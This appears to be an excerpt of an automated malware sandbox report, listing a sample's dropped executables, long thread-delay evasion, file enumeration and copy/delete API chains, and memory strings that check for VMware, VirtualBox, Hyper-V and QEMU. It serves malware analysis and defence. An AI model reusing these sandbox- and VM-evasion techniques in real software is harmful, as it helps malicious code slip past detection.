                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exe TID: 10968Thread sleep time: -5950000s >= -30000s
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exe Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe Code function: 13_2_00408123 FindFirstFileA,FindClose
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe Code function: 13_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe Code function: 13_2_0040342B FindFirstFileA
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe Code function: 14_2_00403432 FindFirstFileA
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe Code function: 14_2_00408123 FindFirstFileA,FindClose
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe Code function: 14_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_009018B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_008F1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_008FD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00902457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_008FB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_008FDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00901DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_008FD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_009027D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00401120 GetSystemInfo,ExitProcess
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599561
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599299
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599174
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598893
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598483
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598351
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598222
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 300000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598084
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597813
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597637
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597472
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597346
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597037
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596914
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596800
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596135
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595776
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595495
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594920
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594786
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594217
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 590125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 588906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 588453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 587906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 585188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 584641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 584063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 583359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 582781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 582250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 581563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 581094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 580531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 580031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 579375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 578844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 578359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 577797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 577109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 576531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 576281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 575797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 575406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 575015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 574734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 574484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 574188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 573904
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 573648
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 573358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 572941
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 572634
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 572276
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 571901
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 571540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 571252
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 570621
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 569433
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 567786
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 567430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 567022
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 566808
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 566377
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 566059
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 565580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 565013
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 564318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 563781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 563375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 562136
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 561159
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 560511
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 559868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 559543
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 559278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 558825
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 558612
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 558271
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 557957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 557511
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 557172
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 556925
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 556480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 556177
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555435
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 554852
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 554123
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 553836
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 553532
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 550943
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 550615
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 550254
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549815
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549415
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549082
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 548720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 548348
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 548105
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547885
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547686
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547497
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547042
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546933
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546744
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546423
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546268
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546085
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545920
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545739
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545568
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545414
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545280
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\logo.png
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\qrcode.png
                  Source: syncUpd.exe, 0000000F.00000002.2758288970.0000000000958000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0k
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: ameNewaPINGPOSTPathQEMUROOTH
                  Source: CGZL5y3D81OCbb2NABnHZhPM.exe, 0000000C.00000002.2361261570.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700588489.000000000073D000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700588489.0000000000765000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000003.2700108075.000000000073D000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000003.2700108075.0000000000765000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 0000000F.00000002.2758288970.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 0000000F.00000002.2758288970.00000000009C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: 11VBoxSFWINDIRWD
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: aryvmcixn-SR-%W
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: main.isRunningInsideVMWare
                  Source: syncUpd.exe, 0000000F.00000002.2758288970.0000000000958000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: tVMSrvcs|!
                  Source: syncUpd.exe, 0000000F.00000002.2758288970.0000000000958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarez
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3256124578.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3228027262.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--D
